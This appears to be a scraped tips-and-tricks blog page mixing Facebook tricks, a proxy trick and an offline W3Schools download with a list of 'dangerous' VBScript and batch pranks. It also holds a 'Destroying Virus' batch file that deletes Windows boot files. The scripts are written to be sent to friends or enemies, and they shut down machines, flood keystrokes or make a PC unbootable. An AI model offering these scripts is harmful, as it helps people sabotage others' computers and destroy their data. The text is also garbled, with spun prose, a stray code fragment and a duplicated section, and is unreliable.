How to Auto Post Happy Birthday Wishes on Facebook Friend's Wall
How to Auto Post Happy Birthday Wishes on Facebook Friend’s Wall
…
Excerpt from:
How to Auto Post Happy Birthday Wishes on Facebook Friend’s Wall
View On WordPress

seen from Latvia
seen from United States
seen from United States

seen from United States
seen from United States

seen from Malaysia
seen from United States
seen from United States
seen from United Kingdom

seen from United States
seen from China

seen from Malaysia

seen from United States

seen from Malaysia
seen from United States

seen from Latvia
seen from Türkiye
seen from India

seen from Ukraine
seen from United States
How to Auto Post Happy Birthday Wishes on Facebook Friend's Wall
How to Auto Post Happy Birthday Wishes on Facebook Friend’s Wall
…
Excerpt from:
How to Auto Post Happy Birthday Wishes on Facebook Friend’s Wall
View On WordPress
Popular Facebook Tips and Tricks - iGiri.Org
New Post has been published on http://igiri.org/facebook-tips-tricks/
Popular Facebook Tips and Tricks
Facebook is worlds largest and Most popular Social Networking sites and Facebook Tips and Tricks makes cool users experience at Facebook. This post, you will go through the some cool FB tips and Tricks that you can use at your Facebook Profile. There are so many FB tips to make your profile...
Use Facebook on any Mobile Without the Internet Connection
Do you have an old cell phone, like the particular Nokia 1100, containing no browser which enables it to do a bit more than make messages or calls? Or will you be stuck in a few remote location where there’s simply no Internet or even no other kind of data (EGDE/GPRS/3G) connectivity can be acquired?
Not a problem. You can easily still employ your Fb account in India by means of dialing *325# (or *fbk#) from your mobile cell phone – this service involves no data plan or perhaps Internet also it will even work with phones on the Stone Age. Here’s a fast tour:
Make use of Facebook without the Data Plan
Facebook India has partnered together with Fonetwish to create Facebook on every mobile phone without needing any apps or maybe the Web.
you dial this *325# no., then key in your Facebook account username and password and you're in. After that you can send no. based commands to use various options of Facebook, chat with friends who will be online, add new people to your friends list, and much more.
Fonetwish says this service currently is available pertaining to Airtel, Aircel, Idea and Tata Docomousers in india.
It usually is much work to read Facebook news feed stories one at a time but this is the good option to quickly up-date your Facebook status or for chatting with friends who are online. The price is reasonable too – you just have pay a subscription fee of 1. 00 every day for unlimited usage.
Other Methods:
Steps :
→1ST OF ALL GO TO:-http://55444.in/fb
→THEN COMPLETE ALL RULES AND REGULATIONS AND USE FREE FACEBOOK VIA SMS 55444
→ITZZ WORKING ALL INDIA
Features :
→HOME-TO GET HOME FEED
→TIMELINE-TO GET TIME LINE
→POSTS STATUS-TO POST STATUS UPDATES [STATUS STATUS_MSG]
→NOTIFICATION- TO GET UNREAD NOTOFICATIONS STEPS TO POST A COMMENT
1.sms #fb home
2.sms 1(for details of first news feed)
3.sms #fb comment your_comment
How To Hide Your Last Name On Facebook ?
Just follow the below steps
Follow The Steps :
1) First you need Indonesian Proxy Servers. This proxy will help you to hide your last name.
2) Goto Firefox — Options — Advanced — Network — Settings — Connection Settings — And choose manual proxy configuration.
3) Now the real Trick starts “Use This Proxy Servers For All Protocols”.
4) Put this proxy and port Http Proxy : 202.70.136.142
Port : 8080 5) Put 202.70.136.142 on No Proxy for Box.
6) Now goto your profile and remove last name then save it.
7) You Just Did It, Now Your Last Name Is Gone, and What left is just you 1st name.
Download W3Schools Website For Offline Use
W3Schoolsis the web developer information web page, with course and references pertaining to web improvement topics for instance HTML, CSS, JavaScript, PHP, along with SQL.
The website derives their name through the abbreviation for the world wide web; W3 is usually a numeronym of WWW. W3Schools.Com just isn’t affiliated with all the W3C.
It really is created along with owned simply by Refsnes Info, a Norwegian family-owned software program development along with consulting corporation
Download W3Schools Website :
1. Download This File Here
2. Extract anywhere This File In Your Computer
3. Then Go To Folder And Open www.w3schools.com folder
4. Scroll Down And Open default.asp
5. Enjoy :D !!
10 ALMOST ALL DANGEROUS AND HARMFUL VBSCRIPT PRANKS
1) Convey just a little message and turn off your computer.: Type : @echo off msg * I don’t like you shutdown -c “Error! You are too ******!” -s Save it as “Anything.BAT" in All Files and send it. 2) Toggle your Caps Fasten press button simultaneously.: Type : Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” loop Save it as “Anything.VBS" and send it. 3) Continually pop out the CD Drive. If there are more than one, it pops out all of them! Type : Set oWMP = CreateObject(“WMPlayer.OCX.7”) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop Save it as “Anything.VBS" and send it. 4) Frustrate someone by making this VBScript hit Enter simultaneously: Type : Set wshShell = wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “~(enter)” loop Save it as “Anything.VBS" and send it. 5) Wide open Notepad, slowly type “Hello, how do you think you’re? I feel good thanks” after some time of clicking on the record and fanatic someone out and about.: Type : WScript.Sleep 180000 WScript.Sleep 10000 Set WshShell = WScript.CreateObject(“WScript.Shell”) WshShell.Run “notepad” WScript.Sleep 100 WshShell.AppActivate “Notepad” WScript.Sleep 500 WshShell.SendKeys “Hel” WScript.Sleep 500 WshShell.SendKeys “lo “ WScript.Sleep 500 WshShell.SendKeys “, ho” WScript.Sleep 500 WshShell.SendKeys “w a” WScript.Sleep 500 WshShell.SendKeys “re “ WScript.Sleep 500 WshShell.SendKeys “you” WScript.Sleep 500 WshShell.SendKeys “? “ WScript.Sleep 500 WshShell.SendKeys “I a” WScript.Sleep 500 WshShell.SendKeys “m g” WScript.Sleep 500 WshShell.SendKeys “ood” WScript.Sleep 500 WshShell.SendKeys ” th” WScript.Sleep 500 WshShell.SendKeys “ank” WScript.Sleep 500 WshShell.SendKeys “s! “ Save it as “Anything.VBS" and send it. 6) Frustrate someone by making this VBScript hit Backspace simultaneously: Type : MsgBox “Let’s go back a few steps” Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{bs}” loop Save it as “Anything.VBS" and send it. 7) Crack the particular computer keyboard in addition to allow it to become type “You are a fool” continuously.: Type : Set wshShell = wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “You are a fool.” loop Save it as “Anything.VBS" and send it. 8. Open Notepad regularly within your friends’ computer system.: Type : @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top Save it as “Anything.BAT" and send it. 9) Difficult prank: Select your killer batch data file. It demands your friend to settle on a range between 1-5 after which does some action.: 1: Shutdown 2: Restart 3: Wipes out your hard drive (BEWARE) 4: Net send 5: Messages then shutdown Type : @echo off title The end of the world cd C:\ :menu cls echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc… pause echo Pick your poison: echo 1. Die this way (Wimp) echo 2. Die this way (WIMP!) echo 3. DO NOT DIE THIS WAY echo 4. Die this way (you’re boring) echo 5. Easy way out set input=nothing set /p input=Choice: if %input%==1 goto one if %input%==2 goto two Save it as “Anything.BAT" and send it.
DESTROY ANY COMPUTER EASILY WITH ONE CLICK
Do not try this your own laptop or computer: Well do not forget that u don’t accomplish this at your own computer in a circumstances because the file, we will create can reboot the actual computer once and as well delete each of the file needed through the computer to restart once again, so u got it right well if you r pranking with your friends or your enemy do not forget that her or his will in no way restart until new Microsoft windows is installed.
Here is the Guide to Destroying Virus:
Open up notepad and copy and paste this:
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
And SAVE this file as .bat
Now that’s it your Virus is ready well it’s a Monster Virus.
Remember don’t click on this file in your Computer. If you feel hunger, try lizard feet
-ali^�tr0� �0� auto;-webkit-text-stroke-width: 0px; word-spacing:0px'>Save it as “Anything.VBS" and send it. 5) Wide open Notepad, slowly type “Hello, how do you think you’re? I feel good thanks” after some time of clicking on the record and fanatic someone out and about.: Type : WScript.Sleep 180000 WScript.Sleep 10000 Set WshShell = WScript.CreateObject(“WScript.Shell”) WshShell.Run “notepad” WScript.Sleep 100 WshShell.AppActivate “Notepad” WScript.Sleep 500 WshShell.SendKeys “Hel” WScript.Sleep 500 WshShell.SendKeys “lo “ WScript.Sleep 500 WshShell.SendKeys “, ho” WScript.Sleep 500 WshShell.SendKeys “w a” WScript.Sleep 500 WshShell.SendKeys “re “ WScript.Sleep 500 WshShell.SendKeys “you” WScript.Sleep 500 WshShell.SendKeys “? “ WScript.Sleep 500 WshShell.SendKeys “I a” WScript.Sleep 500 WshShell.SendKeys “m g” WScript.Sleep 500 WshShell.SendKeys “ood” WScript.Sleep 500 WshShell.SendKeys ” th” WScript.Sleep 500 WshShell.SendKeys “ank” WScript.Sleep 500 WshShell.SendKeys “s! “ Save it as “Anything.VBS" and send it. 6) Frustrate someone by making this VBScript hit Backspace simultaneously: Type : MsgBox “Let’s go back a few steps” Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{bs}” loop Save it as “Anything.VBS" and send it. 7) Crack the particular computer keyboard in addition to allow it to become type “You are a fool” continuously.: Type : Set wshShell = wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “You are a fool.” loop Save it as “Anything.VBS" and send it. 8. Open Notepad regularly within your friends’ computer system.: Type : @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top Save it as “Anything.BAT" and send it. 9) Difficult prank: Select your killer batch data file. It demands your friend to settle on a range between 1-5 after which does some action.: 1: Shutdown 2: Restart 3: Wipes out your hard drive (BEWARE) 4: Net send 5: Messages then shutdown Type : @echo off title The end of the world cd C:\ :menu cls echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc… pause echo Pick your poison: echo 1. Die this way (Wimp) echo 2. Die this way (WIMP!) echo 3. DO NOT DIE THIS WAY echo 4. Die this way (you’re boring) echo 5. Easy way out set input=nothing set /p input=Choice: if %input%==1 goto one if %input%==2 goto two Save it as “Anything.BAT" and send it.
How to find who deleted/Unfriended you on facebook?
You’ll find who taken out or even unfriended you on Facebook utilizing an app referred to as who unfriended me [click here].
This application will backup your whole friends list if you join the first-time and tells via postal mail whenever there’s a change in your friends list This request will backup your whole friends list if you join the first-time and tells via mail whenever there’s a change in your friends list.